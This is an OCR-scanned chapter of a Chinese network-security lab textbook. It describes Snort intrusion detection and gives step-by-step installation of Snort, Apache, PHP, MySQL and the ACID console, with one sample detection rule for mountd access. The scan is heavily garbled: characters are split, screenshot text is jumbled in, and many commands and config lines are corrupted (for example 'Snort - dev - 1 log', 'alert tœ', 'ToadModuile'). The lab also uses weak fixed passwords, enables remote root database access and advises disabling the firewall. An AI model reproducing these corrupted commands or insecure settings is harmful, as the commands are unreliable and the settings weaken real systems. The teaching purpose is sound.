进行 规则 匹配 。 解 码 器 运行 在 各 种 协议 栈 之 上 ,从 数据 链 路 层 到 传输 层 ,最 后 到 应 用 层 , 因 
为 当前 网 络 中 的 数据 流速 度 很 快 , 如 何 保障 较 高 的 速度 是 解码 器 子 系统 中 的 一 个 重点 。 目 
前 ,Snort 解码 器 所 支持 的 协议 包括 Ethernet, SLIP 和 PPP 45, 

3) 预 处 理 器 

预 处 理 模块 的 作用 是 对 当前 截获 的 数据 包 进行 预先 处 理 , 以 便 后 续 处 理 模块 对 数据 包 
的 处 理 操作 。 由 于 最 大 数据 传输 单元 (MTU) 限 制 及 网 络 延 迟 等 问题 ,路 由 器 会 对 数据 包 进 
行 分 片 处 理 。 但 是 恶意 攻击 者 也 会 故意 发 送 经 过 软件 加 工 过 的 数据 包 , 以 便 把 一 个 带 有 攻 
击 性 的 数据 包 分 散 到 各 个 小 的 数据 包 中 ,并 有 可 能 打 乱 数据 包 的 传输 次 序 , 分 多 次 传输 到 目 
标 主机 。 因 此 ,对 异常 数据 包 的 处 理 也 是 入 侵 检测 系统 的 重要 内 容 。 

预 处 理 器 主要 包括 以 下 功能 ， 

。 模拟 TCP/IP 堆栈 功能 的 插件 ,如 IP 碎片 重组 和 TCP 流 重组 插件 。 

。 各 种 解码 插件 ,包括 HTTP 解码 插件 、Unicode 解码 插件 、RPC 解码 插件 和 Telnet 

解码 插件 等 。 

。 规则 匹配 无 法 进行 攻击 检测 时 所 用 的 插件 ,包括 端口 扫描 插件 .Spade 异常 人 侵 检 

测 插件 .Bo 检测 插件 和 ARP 欺骗 检测 插件 等 。 根 据 各 预 处 理 插件 文件 名 可 对 此 插 
件 功 能 做 出 推断 。 

4) 检测 引擎 

检测 引擎 是 入 侵 检 测 系 统 的 核心 内 容 ,Snort 用 一 个 二 维 链表 存储 它 的 检测 规则 ,其 中 
一 维 称 为 规则 头 , 另 一 维 称 为 规则 选项 。 规 则 头 中 放置 的 是 一 些 公共 属性 特征 ,而 规则 选项 
中 放置 的 是 一 些 人 侵 特 征 。Snort 从 配置 文件 读 取 规则 文件 的 位 置 , 并 从 规则 文件 读 取 规 
则 ,存储 到 二 维 链表 中 。 

Snort 的 检测 就 是 二 维 规则 链表 和 网 络 数据 匹配 的 过 程 ,一 旦 匹配 成 功 则 把 检测 结果 
输出 到 输出 插件 。 为 了 提高 检测 速度 ,通常 把 最 常用 的 源 / 目 的 IP 地 址 和 端口 信息 放 在 规 
则 头 链表 中 ,而 把 一 些 独 特 的 检测 标志 放 在 规则 选项 链表 中 。 规 则 匹配 查找 采用 递归 的 方 
法 进行 ,检测 机 制 只 针对 当前 已 经 建立 的 链表 选项 进行 检测 , 当 数 据 包 满足 一 个 规则 时 ,就 
会 触发 相应 的 操作 。Snort 的 检测 机 制 非常 灵活 ,用 户 可 以 根据 自己 的 需要 很 方便 地 在 规 
则 链表 中 添加 所 需要 的 规则 模块 。 数 据 包 匹配 算法 采用 经 典 匹 配 算 法 一 一 多 模式 匹配 算法 
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(AC-BM) ,采用 二 维 链表 和 经 典 匹 配 算法 都 是 为 了 提高 与 网 络 数据 包 的 匹配 速度 ,从 而 提 
高 人 侵 检测 速度 。 

5. 日 志和 报警 子 系统 

日 志和 报警 子 系统 可 以 在 运行 Snort 的 时 候 以 命令 行 交互 的 方式 进行 选择 ,如 果 在 运 
行 时 指定 了 命令 行 的 输出 开关 ,在 Snort 规则 文件 中 指定 的 输出 插件 会 被 替代 。 现 在 可 供 
选择 的 日 志 形 式 有 3 种 ,报警 形式 有 6 种 。Snort 可 以 把 数据 包 以 解码 后 的 文本 形式 或 者 
TCPDump 的 二 进 制 形式 进行 记录 。 和 解码 后 的 格式 便于 系统 对 数据 进行 分 析 , 而 
TCPDump 格式 可 以 保证 很 快 地 完成 磁盘 记录 功能 。 第 三 种 日 志 机 制 就 是 关闭 日 志 服 务 ， 
什么 也 不 做 。 使 用 数据 库 输出 插件 ,Snort 可 以 把 日 志 记 入 数据 库 , 当 前 支持 的 数据 库 包 括 
PostgreSQL, MySQL, Oracle 以 及 UNIX ODBC 数据 库 。 


7.1.3.2 基本 操作 


1. 启动 
Snort 作为 网 络 人 侵 检 测 系 统 ,使 用 下 面 的 命令 行 可 以 启动 这 种 模式 : 


Snort - dev - 1 log - h 192.168.1.0/24 - c Snort.conf 


Snort 会 对 每 个 包 和 规则 集 进行 匹配 ,发 现 这 样 的 包 就 会 根据 规则 的 设置 采取 相应 的 
行动 。 如 果 不 指 定 输出 目录 ,Snort 就 输出 到 /var/log/Snort 目录 。 
也 可 以 采用 如 下 简单 的 命令 方式 : 


Snort - i 2 -c Snort.conf 


Hep i vex A HE PE PS ,监控 的 网 络 设置 以 及 输出 方式 的 设置 都 在 Snort. conf 中 。 

2. 输出 

在 网 络 人 侵 检测 模式 下 ,有 多 种 方式 来 配置 Snort 的 输出 。 在 默认 情况 下 ,Snort 以 
ASCII 格式 记录 日 志 , 使 用 Full 报警 机 制 。 

Snort 有 6 种 报警 机 制 : full, fast socket, syslog, smb(winpopup) fil none。 其 中 以 下 
A 个 可 以 在 命令 行 状态 下 使 用 -A 选项 设置 。 

-A fast: 报警 信息 包括 一 个 时 间 戳 (timestamp)、 报 警 消息 、. 源 /目的 TP 地 址 和 端口 。 

-A full: 是 默认 的 报警 模式 。 

-A unsock: 使 Snort 将 报警 信息 通过 UNIX 的 套 接 字 发 往 一 个 负责 处 理 报警 信息 的 
主机 ,在 该 主机 上 有 一 个 程序 在 套 接 字 上 进行 监听 。 

-A none: 关闭 报警 机 制 。 

3. 规则 集 

规则 集 是 Snort 的 攻击 特征 库 , 每 条 规则 是 一 条 攻击 标识 , Snort 通过 它 来 识别 攻击 行 
为 。Snort 使 用 一 种 简单 的 、 轻 量 级 的 规则 描述 语言 ,这 种 语言 灵活 而 强大 。 一 条 Snort 规 
则 可 以 从 逻辑 上 分 为 两 个 部 分 ， 规则 头 (括号 左边 的 内 容 ) 和 规则 选项 (括号 内 的 内 容 )。 

规则 头 包 含 匹 配 的 行为 动作 、 协 议 类 型 . 源 TP 及 端口 .数据 包 方 向 .目标 IP 及 端口 。 动 
作 包 括 3 类 : 报警 (Alert) .日 志 (Log) 和 通行 (Pass) .表明 Snort 对 包 的 3 种 处 理 方式 ,其 中 
最 常用 的 就 是 alert 动作 , 它 会 向 报警 日 志 中 写 入 报警 信息 。 

在 源 、 目 的 地 址 和 端口 中 可 以 使 用 any 来 代表 任意 的 地 址 或 端口 ,还 可 以 使 用 符号 ! 来 
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表明 取 非 运算 。IP 地 址 可 以 被 指定 为 一 个 CIDR 的 地 址 块 ,端口 也 可 以 指定 一 个 范围 ,在 
目的 和 源 地 址 之 间 可 以 使 用 标识 符 "<-” 和 “->" 来 指明 方向 。 

规则 的 选项 部 分 是 一 个 或 几 个 选项 的 组 合 ,选项 之 间 用 ”“; "分隔, 选项 关键 字 和 值 之 间 
使 用 “: ”分隔 。 对 规则 选项 的 分 析 构 成 了 Snort 检测 引擎 的 核心 。 主 要 可 以 分 为 4 类 : BW 
据 包 相 关 各 种 特征 的 说 明 选 项 .与 规则 本 身 相 关 的 一 些 说 明 选 项 ,规则 匹配 后 的 动作 选项 、 
对 某 些 选项 的 进一步 修饰 。 

下 面 是 一 个 规则 范例 : 


alert tœ any any -> 192.168.1.0/24 111 (content:"| 00 01 86 a5| "; msg: "mountd access";) 


该 规则 表示 监控 的 网 络 数据 的 协议 为 TCP 协议 , 源 地 址 和 源 端口 为 任意 值 , 方 向 为 由 外 向 
内 ,内 部 的 网 络 地 址 为 子 网 192. 168. 1. 0/24 ,端口 号 为 111, 当 发 现 数据 包 中 有 “00 01 86 
a5” 内 容 时 ,Snort 会 发 送 报警 信息 mountd access. 


7.2 入 侵 检测 基础 实验 





实验 器 材 


Snort 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 台 。 


预习 要 求 


(1) 做 好 实验 预习 ,复习 入 侵 检测 技术 的 有 关内 容 。 
(2) 熟悉 Snort 软件 的 使 用 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,掌握 安装 并 运行 一 个 Snort 系统 的 技能 .了解 入 侵 检 测 系统 的 作用 和 功能 。 
实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC 一 台 。 

预备 知识 

入 侵 检测 原理 。 

实验 步 又 


1. 需要 的 组 件 以 及 其 作用 和 功能 

以 下 是 本 实验 涉及 的 各 组 件 的 功能 介绍 。 

(1) Winpcap: Windows 环境 下 的 捕获 网 络 数据 包 驱 动 程序 库 , 下 载 地 址 为 http:// 
www. winpcap. org/ 。 
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(2) Snort: 人 侵 检测 主 程序 ,网 站 提供 Windows 下 的 安装 版 本 ,可 以 直接 下 载 安装 , 源 
代码 在 Linux 下 可 以 直接 编译 生成 ,Windows 下 使 用 Visual Studio 系列 的 编译 器 ,在 工程 
设置 中 ,将 几 个 预 处 理 设置 禁止 ,可 以 编译 通过 ,同时 需要 下 载 Snort 规则 。 下 载 地 址 为 
http://www. snort. org/ 。 

G) Apache: 为 系统 提供 了 Web 服务 支持 ,下 载 地 址 为 http://www. apache. org/。 

(D PHP: 为 系统 提供 了 PHP 支持 ,使 Apache 能 够 运行 PHP 程序 ,下 载 地 址 为 
http://www. php. net/。 

(5) MySQL: 存储 各 种 报警 事件 的 数据 库 系 统 , 下 载 地 址 为 http://www. mysql. com/ , 

(6) ACID; ACID( Analysis Console for Intrusion Databases) 是 基于 PHP 的 入侵 检测 
数据 库 分 析 控 制 台 , 它 能 够 处 理由 各 种 入 侵 检测 系统 、 防 火 墙 等 安全 工具 产生 并 放 入 数据 库 
中 的 安全 事件 ,安装 PHP 就 是 为 使 用 ACID, 下 载 地 址 为 http://acidlab. sourceforge. net/。 

CD Adodb: 是 PHP 连接 数据 库 的 组 件 , 下 载 地 址 为 http://adodb. sourceforge. net/. 

(8) Jpgraph: H PHP 编写 的 基于 面向 对 象 技术 的 图 形 显示 链接 库 ,ACID 通过 Adodb 
读 取 Snort 在 MySQL 中 产生 的 数据 ,将 分 析 结 果 显 示 在 网 页 上 ,并 使 用 Jpgraph 组 件 对 其 
进行 图 形 化 显示 分 析 。 下 载 地 址 为 http://www. aditus. nu/jpgraph/, 

2. 实验 具体 步骤 

1) 安装 Apache 服务 器 

(1) 双击 httpd-2. 2. 17-win32-x86-no_ssl. msi, 

(2) 出 现 Windows 标准 的 软件 安装 欢迎 界面 , 单 击 Next 按钮 继续 ,出 现 授权 协议 , 选 
择 同意 授权 协议 ,然后 继续 ,出 现 安装 说 明 。 

(3) 在 Network Domain 文本 框 中 填写 网 络 域名 ,如 kysf. net, 如 果 没 有 网 络 域名 ,可 以 
任意 填写 。 如 果 架 设 的 Apache 服务 器 要 放 入 Internet, 则 一 定 要 填写 正确 的 网 络 域名 。 在 
Server Name 文本 框 中 填 和 人 服务 器 名 ,如 www. kysf. net, 即 主机 名 。 在 Administrator's 
Email Address 文本 框 中 填写 系统 管理 员 的 电子 邮件 地 址 ,如 indian@163. com, 上述 3 条 
信息 仅 供 参考 , 其 中 电子 邮件 地 址 会 在 系统 出 现 故障 时 将 相关 信息 提供 给 访问 者 。Apache 
服务 器 安装 界面 如 图 7. 2. 1 所 示 。 








EL 
—— — 
Server Information 
Please enter your server's information. 
Network Domain (e.g. somenet.com) 


Server Name (e.g. www.somenet.com): 


Administrator's Email Address (e.g. webmaster @somenet.com): 
[793144750 Gqq.com. 


Install Apache HTTP Server 2.2 programs and shortcuts for: 


© for All Users, on Port 80, as a Service — Recommended. 
@ only for the Current User, on Port 8080, when started Manually. 


InstallShield 








Cosme Joe] 
图 721 Apache 安装 界面 
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(4) 确认 安装 选项 无 误 , 如 果 要 再 检查 一 遍 , 可 以 单 击 Back 按钮 返回 检查 。 单 击 Next 
按钮 开始 安装 。 

(5) 检测 方法 : 若 选择 端口 8080 ,使 用 httpd -k install 命令 将 Apache 设置 为 Windows 
中 的 服务 (如 果 是 Apache2. 2 之 前 的 版 本 ,输入 apache -k install) ,如 图 7. 2. 2 所 示 ; 若 选择 
端口 80, 则 无 须 执行 该 步骤 。 





E] 722 8080 端 口 检测 界面 


(6) 通过 上 述 方式 ,在 DOS 或 者 浏览 器 下 运行 , 均 显 示 启 动 成 功 。 

选择 定制 安装 ,安装 在 默认 文件 夹 C:\apache 下 。 安 装 程序 会 在 该 文件 夹 下 自动 产生 一 
个 子 文件 夹 apache2 继续 完成 安装 。 如 图 7. 2. 3 所 示 ,打开 配 置 文件 C: NapacheVapache2N 
conf\httpd. conf( 根 据 版 本 不 同 , 可 能 是 C:N\apache\conf\httpd. conf) ,将 其 中 的 Listen 
8080 更 改 为 Listen 50080。 这 是 由 于 Windows IIS 中 的 Web 服务 器 默认 情况 下 在 TCP 80 
端口 监听 连接 请 求 , 而 8080 端口 一 般 留 给 代理 服务 器 使 用 ,所 以 为 了 避免 Apache Web 服 
务 器 的 监听 端口 与 其 发 生 冲 突 , 将 Apache Web 服务 器 的 监听 端口 修改 为 不 常用 的 高 端 端 
口 50080。 如 果 安 装 的 时 候 80 端口 未 被 占用 , 则 无 须 修改 端口 。 









ixi 
文件 (全) 









M Change this to Listen on specific IP addresses ao shown below to 
# prevent Apache fron glomming onto all bound IP addresses (0.0.0.0) 
# 


#Listen 12.34.56.78:80 
Listen 50080 


M 
|M Dynamic Shared Object (DSO) Support 
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选择 “开始 ”一 “运行 ”, 输 入 cmd, 进 入 命令 行 方 式 。 输 入 下 面 的 命令 : 





c:\> od apache\ apache?\bin 
c:\apache\ apache2\bin\ apache - k install 
这 是 将 apache 设置 为 Windows 中 的 服务 方式 运行 。 
在 浏览 器 中 进行 访问 时 ,使 用 http://localhost: 50080/ 即 可 。 
2) 添加 Apache 对 PHP 的 支持 
COD 解压 缩 php-5. 2. 6-Win32. zip Æ C:\php. 
(2) 复制 php5ts. dll 文件 到 %systemroot%Nsystem32 。 
(3) 复制 php. ini-dist f XC (F4) B %systemroot %\php. ini, 修 改 php. ini. 





extension-php g@2.dll 
* 165 。 


extension php mysql .911 


如 果 php. ini 中 有 该 句 , 将 此 语句 前 面 的 "; ”注释 符 去 掉 , 如 图 7.2.4 所 示 。 


LITTETI E .-lalxi 
XEO s) West) Bie) 
;extenoion:php. donxnl.dll E 
extensionzphp exif.dll 
;extension:php fdf.dll 
"i 















X z 
php-gettext.dll 
;extension:php huperwaue.d1l 
;extenoion:php iconu.dll 
一 








出 
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同时 复制 C:\php\extension 下 的 php. gd2. dll 与 php_mysql. dll Æ %systemroot%\, 

(4) 添加 gd 图 形 库 的 支持 ,在 C:\apache\ Apache2\conf\httpd. conf 中 添加 : 

ToadModuile php5 module "c:NEhp5NEhp5apache2.dlln 

注意 : Apache 版 本 在 2.2 以 上 的 ,要 将 命令 改 为 LoadModule php5. module "C; \php5 
\php5apache2_2. dl]" ,和 否则 无 法 重新 启动 。 

在 AddType application 一 行 下 面 加 入 下 面 两 行 信息 : 

AddType application/x- httpd- php .php .phtml .php3 .php4 

AddType application/x- httpd- php- source .phps 

(5) 添加 好 后 ,保存 http. conf 文件 。 单 击 “ 开 始 ” 按 钮 ,选择 “运行 ”, 在 弹出 的 窗口 中 输 
A cmd 进入 命令 行 方式 ,输入 下 面 的 命令 : 

net start apache2 


在 Windows 中 启动 Apache Web 服务 ,如 图 7.2.5 所 示 。 
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测试 PHP 脚本 : 
Æ C: Napache2Vhtdocs 目录 下 新 建 test. php, 文 件 内 容 如 下 : 
«?phpinfo( ;?» 
使 用 http: //localhost/test. phpCzX http://127.0.0. 1; 50080/test. php) Wj PHP 是 
否 安 装 成 功 。 
3) 安装 和 配置 Snort 
安装 程序 为 WinPcap_4_0_2. exe, 采 用 默认 安装 即 可 。 
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版 本 一 : 安装 Snort_2_8_1_Installer. exe, 采 用 默认 安装 即 可 ,Snort 的 默认 安装 路 径 是 
C:\snort. 

将 snortrules-snapshot-CURRENT 目录 下 的 所 有 文件 复制 (全 选 ) 到 C: \snort A 
XP. 

用 文件 压缩 包 中 的 snort. conf Es C:\snort\etc\snort. conf, 

版 本 二 : 安装 Snort_2_9_0_1_Installer. exe, 采 用 默认 安装 即 可 ,Snort 的 默认 安装 路 径 
是 C:Nsnort。 

将 snortrules-snapshot-CURRENT 目录 下 的 所 有 文件 复制 (全 选 ) 到 Ci NsnortV rules 
目录 下 。 

在 文件 open-test. conf 中 有 snortrules 的 规则 ,对 应 C:\snort\ete 下 的 snort. conf 内 部 
的 使 用 规则 ,可 以 自行 更 改 。 

4) 安装 和 配置 MySQL 

(1) 解压 mysql-5. 0. 51b-win32. zip, 并 安装 到 默认 文件 夹 C:\mysql 中 。 采 取 默 认 安 
装 。 设 置 数据 库 实 例 流程 ,如 图 7.2.6 一 图 7. 2.13 Bros 
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安装 路 径 : C:\Program Files\MySQL\MySQL Server 5.1, 
(2) 在 命令 行 方 式 下 输入 net start mysql, 启 动 MySQL 服务 ,显示 “请 求 的 服务 已 经 
启动 ”。 
(3) 注意 设置 root 账号 和 密码 ,并 在 命令 行 方式 下 进入 C:\mysql\bin, 输 入 下 面 的 
fp: 
c:\mysql\bin\mysqld -nt -install 
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MySQL Server Instance Configuration Wizerd [xi 
MySQL Server Instance Configuration le: 
Confi the M: $ 5.0 inst s 
onfigure the MySQL Server 5.0 server instance. 


Please select a server type. This will influence memory, disk and CPU usage. 








C Developer Machine 
C This is a development machine, and many other applications will be 
run on it. MySQL Server should only use a minimal amount of 
memory. 


€ Eerver Machine! 
2 Several server applications will be running on this machine. Choose: 
this option For web/application servers. MySQL will have medium 
memory usage. 


C Dedicated MySQL Server Machine 


~ This machine is dedicated to run the MySQL Database Server. No 
other servers, such as a web or mail server, will be run. MySQL will 
utilize up to all available memory. 





< | Gea | 
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MySQL Server Instance Configuration Vizard 区 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 





Please select the database usage. 


€ Fiüfanctionsi Database 
f General purpose databases, This will optimize the server for the use 
of the fast transactional InnoDB storage engine and the high speed 

MyISAM storage engine. 


C Transactional Database Only 


= ‘Optimized for application servers and transactional web applications. 
This will make InnoDB the main storage engine, Note that the 
X MyISAM engine can still be used. 


C Non-Transactional Database Only 


[- ‘Suited for simple web applications, monitoring or logging applications 
it as well as analysis programs. Only the non-transactional MyISAM 
storage engine will be activated. 





coe | [Te] cm | 
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NySQL Server Instance Configuration Wizard E 





MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 





Please set the approximate number of concurrenct connections to the server, 


€ Decision Support (DSS)/OLAP 
Select this option for database applications that will not require a 
high number of concurrent connections. A number of 20 connections 
will be assumed, 





C Online Transaction Processing (OLTP) 


Choose this option for highly concurrent applications that may have 
E Cy one Eine oR Fo S00 active, connections sich as Pei landed 
servers. 


C Manual Setting 
Please enter the approximate number of concurrent connections. 


‘Concurrent connections: fis zl 


« Back | Cancel 
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MySQL Server Instance Configuration Vizard xi 





MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 





Please set the networking options. 
Iv Enable TCP/IP Networking 


Enable this to allow TCP/IP connections, When disabled, only local 
connections through named pipes are allowed. 


Port Number: 





Please set the server SQL mode. 


J Enable Strict Mode 


This option forces the server to behave more like a traditional 
database server. It is recommended to enable this option. 


sek [men]. ce | 
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MySQL Server Instance Configuration Wizard 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 





Please select the default character set. 


C Standard Character Set 


(ete) Makes Latin the default charset. This character set is suited for 
English and other West European languages. 


@ Bes pp gualismi 


Make UTFS the default character set, This is the recommended 
character set for storing text in many different languages. 


C Manual Selected Default Character Set / Collation 
Please specify the character set to use. 


Character Set: lutf8 





A721 MSQ 安装 向 导 界 面 6 





NySQL Server Instance Configuration Wizard [x] 


MySQL Server Instance Configuration 
Configure the MySQL Server 5.0 server instance. 





Please set the Windows options. 


区 Install As Windows Service 


ip This is the recommended way to run the MySQL server 
a S ‘on Windows, 


Mass 
Service Name: |MySQLS ¥ 


JZ Launch the MySQL Server automatically 


I7 [include Bin Directory in Windows PATH 
Check this option to include the directory containing the 
server | client executables in the Windows PATH variable 
so they can be called from the command line. 








E EIER EN 
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MySQL Server Instance Configuration Vizard [x] 





MySQL Server Instance Configuration 

Configure the MySQL Server 5.0 server instance. 

Please set the security options. 

IV Modify Security Settings 
Current root password: [******* — ^ Enter the current password. 
New root password: [=== Enter the root password. 
Confirm: free] Retype the password. 

IV Enable root access from remote machines 
T Create An Anonymous Account 


This option will create an anonymous account on this server. Please 
note that this can lead to an insecure system. 


cok | TT] ce | 
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在 命令 行 方式 下 输入 net start mysql, 启 动 MySQL 服务 。 在 安装 目录 下 (一 般 为 C:\ 
mysql\bin) 运 行 命令 , 单 击 “ 开 始 ” 按 钮 ,选择 "运行", 输 入 cmd, 在 出 现 的 命令 行 窗 口中 输入 
下 面 的 命令 : 

c:\> od mysql\bin 

c:\mysql\bin> mysql - u root - p 

mysql. -u root -p 

输入 刚才 设置 的 root 密码 ,运行 以 下 命令 : 

create database Snort; // 在 输入 分 号 后 MsQL 才 会 编译 执行 语句 

create database Snort_archive; 

create 语句 建立 了 Snort 运行 必需 的 Snort 数据 库 和 snort_archive 数据 库 。 

运行 以 下 命令 : 

c:\mysql\bin\mysql - D snort -u root - p <c:\snort\contrib\create_mysql 

c:\mysql\bin\mysql - D snort archive - u root - p <c:\snort\contrib\create mysql 

上 面 两 个 语句 表示 以 root 用 户 身 份 ,使 用 C:\snort\ contrib 目录 下 的 create. mysql 脚 
本 文件 ,在 Snort 数据 库 和 Snort_archive 数据 库 中 建立 了 Snort 运行 必需 的 数据 表 。 再 次 
以 root 用 户 账号 登录 MySQL 数据 库 , 在 提示 符 后 输入 下 面 的 语句 : 





grant usage on * .* to "acid"@ "localhost" identified by "acidtest"; 

grant usage on * .* to "snort"@ "localhost" identified by "Snorttest"; 

上 面 两 个 语句 表示 在 本 地 数据 库 中 建立 了 acid( 密 码 为 acidtest) 和 snort (密码 为 
snorttest) 两 个 用 户 ,以 备 后 面 使 用 。 


set password for "acid"@ "localhost"- password ("123") ; 
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set password for "snort"@ "localhost"= password ("123") ; 

grant select, insert, update, delete, create,alter on Snort .* to "acid" 

@ "localhost"; 

grant select, insert, update, delete, create,alter on Snort archive .* to "acid" 

@ "localhost"; 

grant select, insert, update,delete, create,alter on Snort .* to "snort" 

@ "localhost"; 

grant select, insert, update, delete, create,alter on Snort archive .* to "snort" 

@ "localhost"; 

上 述 操 作 是 为 新 建 的 用 户 在 Snort 和 Snort_archive 数据 库 中 分 配 权限 。 

在 命令 提示 符 窗口 中 运行 以 下 命令 ,建立 Snort 输出 安全 事件 所 需要 的 表 , 其 中 C:\ 
snort 为 Snort 的 安装 目录 。 

c:\> mysql -Dmysql - u root -p<c:\snort mysql 


执行 命令 前 ,需要 将 snort mysql 复制 到 C 盘 下 ,当然 也 可 以 复制 到 其 他 目录 。 执 行 该 
命令 后 ,系统 提示 输入 root 的 密码 ,输入 密码 后 即 可 建立 所 需要 的 表 。 

5) 安装 其 他 工具 

CD 安装 Adodb, 解 压缩 adodb497. zip 到 C:\php\adodb 目录 下 。 

(2) 安装 Jpgrapg 库 , 解 压缩 jpgraph-1. 22. 1. tar. gz 到 C:\php\jpgraph, 并 且 修 改 C:\ 
php\jpgraph\src\jpgraph. php, 添 加 如 下 一 行 : 


DEFINE ("AE DIR","/tmp/jpgraph cache/"); 


(3) 安装 ACID, 解 压缩 acid-0. 9. 6b23. tar. gz 到 C;\apache\htdocs\acid 目录 下 ,并 将 
C:\apache\htdocs\acid\acid_conf. php 文件 的 如 下 各 行内 容 修 改 为 


$ DBLib path= "c:\php\acbab"; 

$ DBtype= "mysql"; 

$ alert_donare= "snort"; 

$ alert_host= "localhost"; 

$ alert_port= "3306"; 

$ alert user- "acid"; 

$ alert password "acid"; 

/* Archive DB connection parameters * / 

$ archive doname- "snort archive"; 

$ archive host- "localhost"; 

$ archive port- "3306"; 

$ archive user- "acid"; 

$ archive password- "acid"; 

$ ChartLib path= "c:\php\ jpgraph\sre"; 

(A) 通过 浏览 器 访问 http: //127. 0. 0. 1/acid/acid db. setup. php. ,在 打开 的 页 面 中 单 
击 Create ACID AG 按钮 ,让 系统 自动 在 MySQL 中 建立 ACID 运行 必需 的 数据 库 , 如 图 7. 2. 
14 所 示 。 

6) 启动 Snort 

打开 C:\snort\etc\snort. conf 文件 ,将 文件 中 的 下 列 语句 

v EA 


J ACID: DB Setup — Microsoft Internet Explorer 
O SEO SEW KEW IAW Hho 


war O (1-2 





| operation | Description Status 
ACID tables Adds tables to extend the Snort DB to support the ACID functionality AG 


Search Indexes (o i nap Adds indexes to the Snort DB to optimize the speed of the queries 


[Loaded in 1 seconds] 


Roman Danyliw AirCERT 


ele @ Internet 
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include classification.config 


include reference.config 
修改 为 绝对 路 径 : 


include c:\snort\etc\classification.config 





include c:\snort\etc\reference.config 
在 该 文件 的 最 后 加 入 下 面 的 语句 : 


Output database: alert, mysql, host- localhost user= snort password= snorttest 
doname= snort encoding= hex detail= full 


执行 以 下 命令 测试 Snort 是 否 正常 : 
c:\> snort - dev 


能 看 到 一 只 正在 奔跑 的 小 猪 ,证 明 工 作 正常 ,如 图 7 





"t \bin>snort 


Running in packet dump node 


Initializing Snort 
Initializing Output Plugins! 
Ipcap DAQ configured to 
Acquiring network traffic from "\Device \WPF_<@DCADDAC-C818-411( 


Decoding Ethernet 
Initialization Complete 


=> Snort? <* 
Version 2.9.8.1-0DBC-MySQL-F 


By Martin Roesch & The Snort ^ " nort/snort-t 


Using Pt 
Using ZLI 


Commencing packet 
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执行 以 下 命令 查看 本 地 网 络 适配器 编号 : 
c:\> snort -W 
正式 启动 snort: 


c:\> ad snort\bin 
c:\snort\bin> snort - c "c:\snort\etc\snort.conf" - i "c:\snort\ log" -d -e -X 


注意 : 其 中 -i 后 的 参数 为 网 卡 编号 ,由 snort -W 查看 可 知 。 
c:\snort\bin> snort - c "c:\snort\etc\snort.conf™ - 1 "c:\snort\logs"-i2-d-e-X 


-X 参数 用 于 在 数据 链接 层 记 录 raw packet 数据 。 

-d 参数 记录 应 用 层 的 数据 。 

-e 参数 显示 /记录 第 二 层 报 文 头 数 据 。 

-c 参数 用 来 指定 Snort 的 配置 文件 的 路 径 。 

-i 指 明 监听 的 网 络 接口 。 

在 cmd 中 ,运行 snort -W.W 大写。 此 命令 可 以 作为 Snort 是 否 安装 成 功 的 标志 , 同 
时 可 以 看 到 运行 着 的 网 卡 信息 。 一 般 情况 下 ,snort -v 就 可 以 实现 简单 的 嗅 探 任务 。 按 Ctrl 
十 C 键 结 束 嗅 探 。 

较为 复杂 的 是 配置 。RULE_PATH、SO_RULE_PATH、PREPROC_RULE_PATH、 
dynamicpreprocessor 和 dynamicengine 的 路 径 设置 必须 是 绝对 路 径 。 有 一 点 需要 留意 ， 
dynamicpreprocessor 的 路 径 最 后 不 要 以 斜 杠 或 反 斜 杠 结尾 ,如 果 有 :, 则 会 造成 引擎 加 载 失败 。 

使 用 配置 的 命令 方式 为 


snort - v - c "c:\snort\etc\snort.conf" 


#7 HEL“ ERROR; OpenAlertFile() => fopen() alert file log/alert. ids; No such file 
or directory”, 可 通过 以 下 命令 


snort - 1 c:\snort\mylogs - c c:\snort\etc\snort.conf 


将 文件 写 人 指定 目录 中 : 

在 浏览 器 的 地 址 栏 中 输入 http: //localhost ;50080/acid/acid_main. php, 进 入 ACID 分 
析 控 制 台 主 界面 ,可 以 查看 人 侵 检测 的 结果 。 实 验 结果 如 图 7.2. 16 所 示 。 

利用 扫描 实验 的 要 求 扫描 局 域 网 ,查看 检测 的 结果 。 

安装 Snort 时 注意 关闭 防火 墙 。 

Apach 启动 命令 如 下 : 


apache -k install BK apache -k start 
实验 报告 要 求 
。 实验 目的 。 
。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阑 述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 
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Analysis Console for Intrusion Databases 


Added 0 sler(s) to the Alert cache 


Quoried on : Fri December 22, 2006 1650-24 
wrahase:snot artOlocshos (schema version: 0) 
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7.3 Snort 扩展 实验 


实验 器 材 


Snort 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 £i. 


预习 要 求 


(1) 做 好 实验 预习 ,复习 入 侵 检测 技术 的 有 关内 容 。 
(2) 熟悉 Snort 软件 的 使 用 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,进一步 熟悉 和 掌握 Snort 系统 ,完善 人 侵 检测 技能 。 
实验 环境 

装 有 Windows XP/Windows 7 操作 系统 的 PC 一 台 。 

预备 知识 

人 入侵 检 测 原理 。 

实验 步 又 


完善 配置 文件 
打开 C:/snort/etc/snort. conf 文件 .查看 现 有 配置 。 设 置 Snort 的 内 、 外 网 检测 范围 。 
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将 snort. conf 文件 中 var HOME_NET any 语句 中 的 any 改 为 自己 所 在 的 子 网 地 址 ,即将 
Snort 监测 的 内 网 设置 为 本 机 所 在 的 局 域 网 。 如 本 地 IP 为 192. 168. 1. 10, 则 将 any 改 为 
192. 168. 1.0/24, 并 将 var EXTERNAL_NET any 语句 中 的 any 改 为 1192. 168. 1.0/24, 即 
将 Snort 监测 的 外 网 改 为 本 机 所 在 局 域 网 以 外 的 网 络 。 设置 监 测 包含 的 规则 。 找 到 snort 
.conf 文件 中 描述 规则 的 部 分 ,如 图 7. 3. 1 所 示 , snort. conf 文件 中 包含 的 检测 规则 文件 如 
果 前 面 加 # 则 表示 该 规则 没有 启用 ,将 local. rules 之 前 的 # 号 去 掉 , 其 余 规 则 保持 不 变 。 


include $RULE_PATH/finger .rules 
include $RULE_PATH/ftp.rules 
